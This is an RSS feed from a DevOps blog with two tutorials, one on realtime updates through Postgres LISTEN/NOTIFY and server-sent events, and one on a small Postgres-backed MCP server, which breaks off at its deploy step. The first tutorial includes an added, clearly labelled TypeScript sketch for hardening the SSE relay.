<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>DevOps Daily</title>
    <link>https://devops-daily.com</link>
    <description>The latest DevOps news, tutorials, and guides</description>
    <language>en</language>
    <lastBuildDate>Thu, 02 Jul 2026 09:55:53 GMT</lastBuildDate>
    <atom:link href="https://devops-daily.com/feed.xml" rel="self" type="application/rss+xml"/>
    
    <item>
      <title><![CDATA[Realtime Without a WebSocket Service]]></title>
      <link>https://devops-daily.com/posts/neon-functions-realtime-without-websockets</link>
      <description><![CDATA[Live counters, presence, notifications: the reflex is to add a websocket service to run and pay for. But if your data already lives in Postgres, it has a pub/sub built in. Here is realtime fan-out with Postgres LISTEN/NOTIFY and SSE on a Neon Function, tested with two live subscribers.]]></description>
      <pubDate>Thu, 02 Jul 2026 17:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-functions-realtime-without-websockets</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[neon]]></category><category><![CDATA[functions]]></category><category><![CDATA[postgres]]></category><category><![CDATA[realtime]]></category><category><![CDATA[sse]]></category><category><![CDATA[serverless]]></category>
      <content:encoded><![CDATA[<p>The moment a feature needs to update live, a live counter, a presence indicator, a &quot;new message&quot; badge, an activity feed, the reflex is to reach for a websocket service. Pusher, Ably, a Socket.IO server, a stateful Node process parked next to your stateless app. That is one more thing to deploy, scale, secure, and pay for, and it exists mostly to move small events from one place to a bunch of connected browsers.</p>
<p>If your data already lives in Postgres, you already have a message bus for that. Postgres ships with <code>LISTEN</code> and <code>NOTIFY</code>, a lightweight publish/subscribe system built into the database. Pair it with server-sent events from a serverless function and you can fan realtime updates out to every connected client without standing up any realtime infrastructure at all. In this post I build exactly that on a Neon Function, explain the one part that is subtle on serverless, and prove it works with two live subscribers. The <a href="https://github.com/The-DevOps-Daily/neon-realtime-demo">repo</a> is at the end.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><ul>
<li>Postgres <code>LISTEN</code>/<code>NOTIFY</code> is a built-in pub/sub. <code>NOTIFY channel, &#39;payload&#39;</code> delivers to every connection that has run <code>LISTEN channel</code>.</li>
<li>A serverless function holds each browser&#39;s SSE connection open and keeps one Postgres <code>LISTEN</code> connection. On a write, the app calls <code>pg_notify</code>, and every isolate pushes the event to its SSE clients.</li>
<li>The subtle part on serverless: the runtime runs several isolates, each with its own in-memory set of clients. <code>LISTEN</code>/<code>NOTIFY</code> is what fans an event across all of them; an in-process broadcast alone would only reach one isolate&#39;s clients.</li>
<li>One real gotcha: <code>LISTEN</code> needs a session, so it must use a direct (unpooled) connection, not the transaction pooler.</li>
<li>It is fan-out for small live events, not a durable queue. For guaranteed delivery or bidirectional low-latency you still want a real broker or websockets.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>A Neon project on the platform preview (Functions, <code>us-east-2</code>)</li>
<li>The Neon CLI (<code>npm i -g neon</code>, then <code>neon login</code>)</li>
<li>Familiarity with Postgres and with SSE / <code>EventSource</code> on the client</li>
</ul>
<h2 id="h2-the-two-pieces" class="group relative scroll-mt-24">
        <a href="#h2-the-two-pieces" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The two pieces
        </a>
        </h2><p><strong>Postgres LISTEN/NOTIFY</strong> is a pub/sub channel inside the database. A connection subscribes with <code>LISTEN counter_updates</code>, and any connection (from anywhere) that runs <code>NOTIFY counter_updates, &#39;42&#39;</code> causes Postgres to deliver that payload to every subscriber. No extra service, no broker to run; it is a feature of the database you already have.</p>
<p><strong>Server-sent events (SSE)</strong> are the other half. SSE is a long-lived HTTP response that streams <code>data:</code> frames to the browser, consumed with the built-in <code>EventSource</code> API. It is one-directional (server to client), which is exactly the shape of most realtime UI: the server has news, the browser wants it. And because it is just an HTTP response, a serverless function can serve it.</p>
<p>Put them together: the function streams SSE to browsers and relays anything it hears on a Postgres channel.</p>
<h2 id="h2-the-part-that-is-subtle-on-serverless" class="group relative scroll-mt-24">
        <a href="#h2-the-part-that-is-subtle-on-serverless" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The part that is subtle on serverless
        </a>
        </h2><p>Here is the trap. A function under load does not run as one process; the runtime spins up several isolates in parallel. Each isolate has its own memory, so each keeps its own set of open SSE connections. If you only broadcast in-process, a client connected to isolate A never sees an event triggered through isolate B.</p>
<p><code>LISTEN</code>/<code>NOTIFY</code> is what closes that gap. Every isolate opens its own <code>LISTEN</code> connection to Postgres. When any code anywhere calls <code>NOTIFY</code>, Postgres delivers it to all of those connections, so every isolate gets the event and pushes it to its own clients. Postgres is the shared fan-out point that the isolates do not otherwise have.</p>
<pre><code class="hljs language-typescript"><span class="hljs-comment">// One dedicated LISTEN connection per isolate. LISTEN needs a real session,</span>
<span class="hljs-comment">// so use the DIRECT (unpooled) URL, not the transaction pooler.</span>
<span class="hljs-keyword">const</span> listener = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Client</span>({ <span class="hljs-attr">connectionString</span>: env.<span class="hljs-property">postgres</span>.<span class="hljs-property">databaseUrlUnpooled</span> });
<span class="hljs-keyword">await</span> listener.<span class="hljs-title function_">connect</span>();
<span class="hljs-keyword">await</span> listener.<span class="hljs-title function_">query</span>(<span class="hljs-string">&#x27;LISTEN counter_updates&#x27;</span>);

<span class="hljs-comment">// SSE connections held open by THIS isolate.</span>
<span class="hljs-keyword">const</span> clients = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Set</span>&lt;<span class="hljs-title class_">ReadableStreamDefaultController</span>&lt;<span class="hljs-title class_">Uint8Array</span>&gt;&gt;();

listener.<span class="hljs-title function_">on</span>(<span class="hljs-string">&#x27;notification&#x27;</span>, <span class="hljs-function">(<span class="hljs-params">msg</span>) =&gt;</span> {
  <span class="hljs-keyword">const</span> frame = <span class="hljs-keyword">new</span> <span class="hljs-title class_">TextEncoder</span>().<span class="hljs-title function_">encode</span>(<span class="hljs-string">`data: <span class="hljs-subst">${msg.payload}</span>\n\n`</span>);
  <span class="hljs-keyword">for</span> (<span class="hljs-keyword">const</span> c <span class="hljs-keyword">of</span> clients) c.<span class="hljs-title function_">enqueue</span>(frame); <span class="hljs-comment">// push to this isolate&#x27;s browsers</span>
});
</code></pre><p>The write path is a normal query plus a <code>NOTIFY</code>:</p>
<pre><code class="hljs language-typescript">app.<span class="hljs-title function_">post</span>(<span class="hljs-string">&#x27;/increment&#x27;</span>, <span class="hljs-title function_">async</span> (c) =&gt; {
  <span class="hljs-keyword">const</span> [row] = <span class="hljs-keyword">await</span> db
    .<span class="hljs-title function_">insert</span>(counters)
    .<span class="hljs-title function_">values</span>({ <span class="hljs-attr">id</span>: <span class="hljs-number">1</span>, <span class="hljs-attr">value</span>: <span class="hljs-number">1</span> })
    .<span class="hljs-title function_">onConflictDoUpdate</span>({ <span class="hljs-attr">target</span>: counters.<span class="hljs-property">id</span>, <span class="hljs-attr">set</span>: { <span class="hljs-attr">value</span>: sql<span class="hljs-string">`<span class="hljs-subst">${counters.value}</span> + 1`</span> } })
    .<span class="hljs-title function_">returning</span>({ <span class="hljs-attr">value</span>: counters.<span class="hljs-property">value</span> });
  <span class="hljs-comment">// Fan the new value out to every isolate, and thus every browser.</span>
  <span class="hljs-keyword">await</span> pool.<span class="hljs-title function_">query</span>(<span class="hljs-string">&#x27;SELECT pg_notify($1, $2)&#x27;</span>, [<span class="hljs-string">&#x27;counter_updates&#x27;</span>, <span class="hljs-title class_">String</span>(row.<span class="hljs-property">value</span>)]);
  <span class="hljs-keyword">return</span> c.<span class="hljs-title function_">json</span>({ <span class="hljs-attr">value</span>: row.<span class="hljs-property">value</span> });
});
</code></pre><p>And the SSE endpoint just registers the browser and streams:</p>
<pre><code class="hljs language-typescript">app.<span class="hljs-title function_">get</span>(<span class="hljs-string">&#x27;/events&#x27;</span>, <span class="hljs-title function_">async</span> (c) =&gt; {
  <span class="hljs-comment">// Captured so cancel() can deregister the controller that start() registered.</span>
  <span class="hljs-keyword">let</span> <span class="hljs-attr">registered</span>: <span class="hljs-title class_">ReadableStreamDefaultController</span>&lt;<span class="hljs-title class_">Uint8Array</span>&gt; | <span class="hljs-literal">undefined</span>;
  <span class="hljs-keyword">const</span> stream = <span class="hljs-keyword">new</span> <span class="hljs-title class_">ReadableStream</span>&lt;<span class="hljs-title class_">Uint8Array</span>&gt;({
    <span class="hljs-title function_">start</span>(<span class="hljs-params">controller</span>) {
      registered = controller;
      clients.<span class="hljs-title function_">add</span>(controller);
      <span class="hljs-comment">// send the current value immediately so a new tab is correct on load</span>
      <span class="hljs-title function_">readCount</span>().<span class="hljs-title function_">then</span>(<span class="hljs-function">(<span class="hljs-params">v</span>) =&gt;</span> controller.<span class="hljs-title function_">enqueue</span>(<span class="hljs-title function_">encode</span>(<span class="hljs-string">`data: <span class="hljs-subst">${v}</span>\n\n`</span>)));
    },
    <span class="hljs-title function_">cancel</span>(<span class="hljs-params"></span>) {
      <span class="hljs-comment">// Browser went away: drop its controller so the notification handler</span>
      <span class="hljs-comment">// stops enqueueing into a closed stream.</span>
      <span class="hljs-keyword">if</span> (registered) clients.<span class="hljs-title function_">delete</span>(registered);
    },
  });
  <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Response</span>(stream, {
    <span class="hljs-attr">headers</span>: { <span class="hljs-string">&#x27;Content-Type&#x27;</span>: <span class="hljs-string">&#x27;text/event-stream&#x27;</span>, <span class="hljs-string">&#x27;Cache-Control&#x27;</span>: <span class="hljs-string">&#x27;no-cache&#x27;</span> },
  });
});
</code></pre><div class="post-callout post-callout--warning"><span class="post-callout__icon"><svg viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" aria-hidden="true"><path d="M10.3 3.9 1.8 18a2 2 0 0 0 1.7 3h16.9a2 2 0 0 0 1.7-3L13.7 3.9a2 2 0 0 0-3.4 0z"/><path d="M12 9v4"/><path d="M12 17h.01"/></svg></span><div class="post-callout__content"><span class="post-callout__label">Warning</span><div class="post-callout__body"><p><code>LISTEN</code> holds a session-level subscription, which the transaction pooler (PgBouncer in transaction mode) does not support. Use the direct, unpooled connection string for the listener (Neon injects it as <code>DATABASE_URL_UNPOOLED</code>). Keep using the pooled URL for your normal queries. Getting this wrong is the usual reason &quot;notifications never arrive.&quot;</p>
</div></div></div><h2 id="h2-proving-it-works" class="group relative scroll-mt-24">
        <a href="#h2-proving-it-works" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Proving it works
        </a>
        </h2><p>I deployed the counter as a Neon Function and connected two independent SSE subscribers, then fired three increments. Every subscriber should see its starting value on connect and then each new value as it happens. Here is the actual run:</p>
<div class="post-terminal not-prose" data-terminal="{&quot;title&quot;:&quot;two subscribers, one NOTIFY each&quot;,&quot;prompt&quot;:&quot;$&quot;,&quot;steps&quot;:[{&quot;comment&quot;:&quot;two browsers (A and B) open EventSource on /events; both get the current value&quot;},{&quot;cmd&quot;:&quot;node realtime-test.mjs $URL&quot;,&quot;output&quot;:&quot;start count: 0\n[A] &lt;- 0\n[B] &lt;- 0&quot;},{&quot;comment&quot;:&quot;POST /increment writes the row and calls pg_notify once&quot;},{&quot;cmd&quot;:&quot;curl -X POST $URL/increment&quot;,&quot;output&quot;:&quot;{ \&quot;value\&quot;: 1 }&quot;},{&quot;comment&quot;:&quot;both subscribers receive it live, from the single NOTIFY&quot;},{&quot;cmd&quot;:&quot;&quot;,&quot;output&quot;:&quot;[A] &lt;- 1\n[B] &lt;- 1&quot;},{&quot;cmd&quot;:&quot;curl -X POST $URL/increment  # x2 more&quot;,&quot;output&quot;:&quot;[A] &lt;- 2\n[B] &lt;- 2\n[A] &lt;- 3\n[B] &lt;- 3&quot;},{&quot;comment&quot;:&quot;final tally from the two independent streams&quot;},{&quot;cmd&quot;:&quot;&quot;,&quot;output&quot;:&quot;A received: 0, 1, 2, 3\nB received: 0, 1, 2, 3&quot;}]}"></div><p>Both streams saw every value. Neither subscriber talked to the other, and there is no websocket server anywhere in this picture; the events traveled browser → function → Postgres <code>NOTIFY</code> → every function isolate → every browser.</p>
<h2 id="h2-websocket-service-vs-listennotify-sse" class="group relative scroll-mt-24">
        <a href="#h2-websocket-service-vs-listennotify-sse" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          WebSocket service vs LISTEN/NOTIFY + SSE
        </a>
        </h2><table>
<thead>
<tr>
<th></th>
<th>Dedicated websocket service</th>
<th>LISTEN/NOTIFY + SSE on a function</th>
</tr>
</thead>
<tbody><tr>
<td>Extra infrastructure</td>
<td>A service to run, scale, secure</td>
<td>None; uses Postgres + the function</td>
</tr>
<tr>
<td>Direction</td>
<td>Bidirectional</td>
<td>Server to client (SSE)</td>
</tr>
<tr>
<td>Fan-out bus</td>
<td>The service</td>
<td>Postgres <code>NOTIFY</code></td>
</tr>
<tr>
<td>Delivery</td>
<td>Often buffered / retried</td>
<td>Best-effort; dropped if no listener</td>
</tr>
<tr>
<td>Best for</td>
<td>Chat, cursors, games, huge fan-out</td>
<td>Live counters, feeds, notifications, presence</td>
</tr>
</tbody></table>
<h2 id="h2-where-this-stops-being-enough" class="group relative scroll-mt-24">
        <a href="#h2-where-this-stops-being-enough" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Where this stops being enough
        </a>
        </h2><p>This pattern is a genuine &quot;delete a service&quot; win for a large class of realtime features, but be honest about its edges:</p>
<ul>
<li><strong>It is not a durable queue.</strong> <code>NOTIFY</code> is fire-and-forget. If nobody is listening at that instant, the message is gone. That is fine for a live UI that re-reads state on reconnect; it is not fine for guaranteed delivery or work queues.</li>
<li><strong>Payloads are small.</strong> Postgres caps a <code>NOTIFY</code> payload at 8000 bytes. Send an id or a small value and let clients fetch details, rather than shipping large blobs through the channel.</li>
<li><strong>SSE is one-way.</strong> For low-latency bidirectional traffic (multiplayer, live cursors, collaborative editing) a websocket is still the right tool.</li>
<li><strong>At very high scale</strong> a dedicated broker earns its keep. This shines at the small-to-medium fan-out that most apps actually need, without the standing infrastructure.</li>
</ul>
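<p>A hardening sketch for the relay and write path shown earlier, added here as an example and not taken from the post or its repo. It checks the <code>NOTIFY</code> payload size in bytes before publishing, frames multi-line payloads so a newline cannot truncate or split an SSE event, and prunes controllers whose stream has closed. It goes beyond the counter (whose payload is always a number) to feeds and notifications; all function names are hypothetical and the sample payloads are constructed.</p>

```typescript
// Added example, not code from the article or its repository.
// Every name below is hypothetical; sample payloads are constructed.

const utf8 = new TextEncoder();

// Postgres requires a NOTIFY payload to be shorter than 8000 bytes (default build).
const MAX_NOTIFY_BYTES = 8000;

// Anything with enqueue(); ReadableStreamDefaultController<Uint8Array> fits structurally.
interface Sink {
  enqueue(chunk: Uint8Array): void;
}

// Write path: measure BYTES, not characters, before calling pg_notify.
function fitsNotify(payload: string): boolean {
  return utf8.encode(payload).length < MAX_NOTIFY_BYTES;
}

// Relay path: one "data:" line per payload line, then a blank line to end the event.
// A raw `data: ${payload}\n\n` lets a newline inside the payload end the field early.
function sseFrame(payload: string): Uint8Array {
  const lines = payload.split(/\r\n|\r|\n/);
  return utf8.encode(lines.map((l) => "data: " + l + "\n").join("") + "\n");
}

// Fan-out for one isolate: a closed stream makes enqueue() throw, so drop that
// sink and keep delivering to the rest instead of aborting the loop.
function broadcast(clients: Set<Sink>, payload: string): number {
  const frame = sseFrame(payload);
  let delivered = 0;
  clients.forEach((c) => {
    try {
      c.enqueue(frame);
      delivered += 1;
    } catch {
      clients.delete(c);
    }
  });
  return delivered;
}

// Minimal reader for the data: field, following the EventSource line rules.
// Used only to check what a browser would reconstruct from a frame.
function readSse(text: string): string[] {
  const events: string[] = [];
  let data: string[] = [];
  for (const line of text.split(/\r\n|\r|\n/)) {
    if (line === "") {
      if (data.length > 0) events.push(data.join("\n"));
      data = [];
    } else if (line.indexOf("data:") === 0) {
      data.push(line.slice(5).replace(/^ /, ""));
    }
  }
  return events;
}

// Compare the unescaped framing with sseFrame() for the same payload.
function compareFraming(payload: string): { naive: string[]; hardened: string[] } {
  const naive = readSse("data: " + payload + "\n\n");
  const hardened = readSse(new TextDecoder().decode(sseFrame(payload)));
  return { naive, hardened };
}
```

<p>With the constructed payload <code>"first\nsecond"</code>, the unescaped framing delivers only <code>first</code> to the browser, while <code>sseFrame</code> delivers the payload intact.</p>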
<h2 id="h2-the-repo" class="group relative scroll-mt-24">
        <a href="#h2-the-repo" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The repo
        </a>
        </h2><p>The full counter, backend function plus a small web client, is here:</p>
<div class="post-github not-prose" data-repo="The-DevOps-Daily/neon-realtime-demo"></div><h2 id="h2-wrapping-up" class="group relative scroll-mt-24">
        <a href="#h2-wrapping-up" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Wrapping up
        </a>
        </h2><p>Realtime does not always mean a websocket service. For the common cases, a live number, a badge, a feed, an activity stream, Postgres <code>LISTEN</code>/<code>NOTIFY</code> is a pub/sub you already run, and SSE from a serverless function is enough to get those events to the browser. On Neon the function lives on the branch next to Postgres, so the listener connection is a local hop and the whole realtime path is one deploy, no separate service to operate. Reach for a real broker or websockets when you need durability or two-way low latency; reach for this when you just want the UI to update and would rather not run another box to make it happen.</p>
]]></content:encoded>
    </item>
    <item>
      <title><![CDATA[A Postgres-Backed MCP Server in ~20 Lines]]></title>
      <link>https://devops-daily.com/posts/neon-functions-postgres-mcp-server</link>
      <description><![CDATA[Most of what an MCP server does is run database queries on behalf of an AI agent. So I put one right next to the database. Here is a Postgres-backed MCP server built on Neon Functions, deployed onto a database branch, with the code, a live client test, and the repo.]]></description>
      <pubDate>Thu, 02 Jul 2026 09:00:00 GMT</pubDate>
      <guid isPermaLink="true">https://devops-daily.com/posts/neon-functions-postgres-mcp-server</guid>
      <category><![CDATA[DevOps]]></category>
      <author><![CDATA[DevOps Daily Team]]></author>
      <category><![CDATA[neon]]></category><category><![CDATA[mcp]]></category><category><![CDATA[postgres]]></category><category><![CDATA[functions]]></category><category><![CDATA[ai-agents]]></category><category><![CDATA[serverless]]></category>
      <content:encoded><![CDATA[<p>The Model Context Protocol is how an AI agent gets tools. You stand up an MCP server, it advertises a set of tools with typed inputs, and the agent calls them. For a huge number of real MCP servers, those tools are thin wrappers around a database: search these records, create this row, update that field. The server is mostly a translator between JSON-RPC and SQL.</p>
<p>Which raises an obvious question. If an MCP server spends its life talking to Postgres, why does it so often run somewhere far away from Postgres? The usual setup is an MCP server on one host and the database on another, so every tool call pays a network round trip to reach the data it needs.</p>
<p>Neon Functions let you skip that. You deploy the MCP server as a function that lives on the same database branch it queries, in the same region, so the server-to-Postgres hop is a local one. In this post I build a Postgres-backed MCP server, deploy it onto a branch, connect a real MCP client, and show what the round trips actually look like. The whole thing is about twenty lines of interesting code, and the <a href="https://github.com/The-DevOps-Daily/neon-mcp-demo">repo</a> is at the end.</p>
<h2 id="h2-tldr" class="group relative scroll-mt-24">
        <a href="#h2-tldr" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          TL;DR
        </a>
        </h2><ul>
<li>An MCP server that exposes database tools is mostly network plus queries. Running it next to the database removes a cross-region hop from every tool call.</li>
<li>Neon Functions deploy your MCP server onto a database branch, co-located with Postgres. The server-to-database query is a same-region hop of a millisecond or two, not a transatlantic one.</li>
<li>The core is small: define a Drizzle schema, register a tool whose handler runs a query, and expose the MCP server over the streamable HTTP transport at <code>/mcp</code>. That is the ~20 lines.</li>
<li>Any MCP client that speaks streamable HTTP connects to it: <code>mcporter</code>, the MCP SDK, or an agent like Claude or Cursor pointed at the URL.</li>
<li>Each branch gets its own function URL, so every preview or test branch can have its own isolated MCP endpoint over its own copy of the data.</li>
</ul>
<h2 id="h2-prerequisites" class="group relative scroll-mt-24">
        <a href="#h2-prerequisites" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Prerequisites
        </a>
        </h2><ul>
<li>Node.js 20+ and the Neon CLI (<code>npm i -g neon</code>, then <code>neon login</code>)</li>
<li>A Neon account with the platform preview enabled (Functions, new <code>us-east-2</code> projects)</li>
<li>Basic familiarity with Postgres and TypeScript</li>
<li>Optional: an MCP client to point at it, such as <code>mcporter</code>, Claude, or Cursor</li>
</ul>
<h2 id="h2-what-an-mcp-server-actually-is" class="group relative scroll-mt-24">
        <a href="#h2-what-an-mcp-server-actually-is" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          What an MCP server actually is
        </a>
        </h2><p>Strip away the branding and an MCP server is a small RPC service. It speaks JSON-RPC over a transport, and it advertises a list of tools. Each tool has a name, a description, and an input schema. When the agent decides to call a tool, the server runs a handler and returns a result. That is the whole contract.</p>
<p>The transport here is streamable HTTP: the client POSTs JSON-RPC messages to a single endpoint (<code>/mcp</code>) and reads responses back, with server-sent events for anything streamed. It works over plain HTTPS, which is exactly what a serverless function serves, so an MCP server and a Neon Function are a natural fit.</p>
<h2 id="h2-the-20-lines" class="group relative scroll-mt-24">
        <a href="#h2-the-20-lines" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          The ~20 lines
        </a>
        </h2><p>Here is the core of a Postgres-backed MCP server. A schema, one tool whose handler runs a query, and the wiring to expose it over streamable HTTP. Everything else is more of the same.</p>
<pre><code class="hljs language-typescript"><span class="hljs-keyword">import</span> { <span class="hljs-title class_">Hono</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;hono&#x27;</span>;
<span class="hljs-keyword">import</span> { drizzle } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;drizzle-orm/node-postgres&#x27;</span>;
<span class="hljs-keyword">import</span> { <span class="hljs-title class_">Pool</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;pg&#x27;</span>;
<span class="hljs-keyword">import</span> { ilike } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;drizzle-orm&#x27;</span>;
<span class="hljs-keyword">import</span> { z } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;zod&#x27;</span>;
<span class="hljs-keyword">import</span> { <span class="hljs-title class_">McpServer</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@modelcontextprotocol/sdk/server/mcp.js&#x27;</span>;
<span class="hljs-keyword">import</span> { <span class="hljs-title class_">StreamableHTTPTransport</span> } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@hono/mcp&#x27;</span>;
<span class="hljs-keyword">import</span> { contacts } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;./db/schema&#x27;</span>;

<span class="hljs-comment">// One pool per isolate, reused across requests.</span>
<span class="hljs-keyword">const</span> db = <span class="hljs-title function_">drizzle</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">Pool</span>({ <span class="hljs-attr">connectionString</span>: process.<span class="hljs-property">env</span>.<span class="hljs-property">DATABASE_URL</span> }));

<span class="hljs-keyword">const</span> mcp = <span class="hljs-keyword">new</span> <span class="hljs-title class_">McpServer</span>({ <span class="hljs-attr">name</span>: <span class="hljs-string">&#x27;contacts&#x27;</span>, <span class="hljs-attr">version</span>: <span class="hljs-string">&#x27;1.0.0&#x27;</span> });

mcp.<span class="hljs-title function_">registerTool</span>(
  <span class="hljs-string">&#x27;search_contacts&#x27;</span>,
  {
    <span class="hljs-attr">description</span>: <span class="hljs-string">&#x27;Search contacts by name. Omit the query to list everyone.&#x27;</span>,
    <span class="hljs-attr">inputSchema</span>: { <span class="hljs-attr">query</span>: z.<span class="hljs-title function_">string</span>().<span class="hljs-title function_">optional</span>().<span class="hljs-title function_">describe</span>(<span class="hljs-string">&#x27;substring to match&#x27;</span>) },
  },
  <span class="hljs-title function_">async</span> ({ query }) =&gt; {
    <span class="hljs-keyword">const</span> rows = <span class="hljs-keyword">await</span> db
      .<span class="hljs-title function_">select</span>()
      .<span class="hljs-title function_">from</span>(contacts)
      .<span class="hljs-title function_">where</span>(query ? <span class="hljs-title function_">ilike</span>(contacts.<span class="hljs-property">name</span>, <span class="hljs-string">`%<span class="hljs-subst">${query}</span>%`</span>) : <span class="hljs-literal">undefined</span>);
    <span class="hljs-keyword">return</span> { <span class="hljs-attr">content</span>: [{ <span class="hljs-attr">type</span>: <span class="hljs-string">&#x27;text&#x27;</span>, <span class="hljs-attr">text</span>: <span class="hljs-title class_">JSON</span>.<span class="hljs-title function_">stringify</span>(rows) }] };
  },
);

<span class="hljs-comment">// Expose the server over streamable HTTP at /mcp.</span>
<span class="hljs-keyword">const</span> app = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Hono</span>();
<span class="hljs-keyword">const</span> transport = <span class="hljs-keyword">new</span> <span class="hljs-title class_">StreamableHTTPTransport</span>();
app.<span class="hljs-title function_">all</span>(<span class="hljs-string">&#x27;/mcp&#x27;</span>, <span class="hljs-title function_">async</span> (c) =&gt; {
  <span class="hljs-keyword">if</span> (!mcp.<span class="hljs-title function_">isConnected</span>()) <span class="hljs-keyword">await</span> mcp.<span class="hljs-title function_">connect</span>(transport);
  <span class="hljs-keyword">return</span> transport.<span class="hljs-title function_">handleRequest</span>(c);
});

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> app;
</code></pre><p>The tool handler is the interesting part. It is just a query. <code>registerTool</code> gives the agent the name, the description, and a Zod input schema (the SDK turns that into the JSON schema the model sees), and your handler returns content. The <a href="https://github.com/The-DevOps-Daily/neon-mcp-demo">companion repo</a> fills this out to full CRUD (<code>create_contact</code>, <code>update_contact</code>, <code>delete_contact</code>, <code>search_contacts</code>) against a small <code>contacts</code> table, but every tool follows this same shape: describe it, run a query, return the rows.</p>
<p>The schema is ordinary Drizzle:</p>
<pre><code class="hljs language-typescript"><span class="hljs-keyword">import</span> { pgTable, serial, text, timestamp } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;drizzle-orm/pg-core&#x27;</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">const</span> contacts = <span class="hljs-title function_">pgTable</span>(<span class="hljs-string">&#x27;contacts&#x27;</span>, {
  <span class="hljs-attr">id</span>: <span class="hljs-title function_">serial</span>(<span class="hljs-string">&#x27;id&#x27;</span>).<span class="hljs-title function_">primaryKey</span>(),
  <span class="hljs-attr">name</span>: <span class="hljs-title function_">text</span>(<span class="hljs-string">&#x27;name&#x27;</span>).<span class="hljs-title function_">notNull</span>(),
  <span class="hljs-attr">email</span>: <span class="hljs-title function_">text</span>(<span class="hljs-string">&#x27;email&#x27;</span>),
  <span class="hljs-attr">company</span>: <span class="hljs-title function_">text</span>(<span class="hljs-string">&#x27;company&#x27;</span>),
  <span class="hljs-attr">notes</span>: <span class="hljs-title function_">text</span>(<span class="hljs-string">&#x27;notes&#x27;</span>),
  <span class="hljs-attr">createdAt</span>: <span class="hljs-title function_">timestamp</span>(<span class="hljs-string">&#x27;created_at&#x27;</span>).<span class="hljs-title function_">defaultNow</span>().<span class="hljs-title function_">notNull</span>(),
});
</code></pre><p>And the function declaration that tells Neon what to deploy:</p>
<pre><code class="hljs language-typescript"><span class="hljs-comment">// neon.ts</span>
<span class="hljs-keyword">import</span> { defineConfig } <span class="hljs-keyword">from</span> <span class="hljs-string">&#x27;@neon/config/v1&#x27;</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-title function_">defineConfig</span>({
  <span class="hljs-attr">preview</span>: {
    <span class="hljs-attr">functions</span>: {
      <span class="hljs-attr">contacts</span>: { <span class="hljs-attr">name</span>: <span class="hljs-string">&#x27;contacts mcp server&#x27;</span>, <span class="hljs-attr">source</span>: <span class="hljs-string">&#x27;src/index.ts&#x27;</span> },
    },
  },
});
</code></pre><h2 id="h2-deploy-it-onto-the-branch" class="group relative scroll-mt-24">
        <a href="#h2-deploy-it-onto-the-branch" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          Deploy it onto the branch
        </a>
        </h2><p>The Neon CLI scaffolds the template, links (or creates) a project, pushes the schema, and deploys the function. From an empty directory:</p>
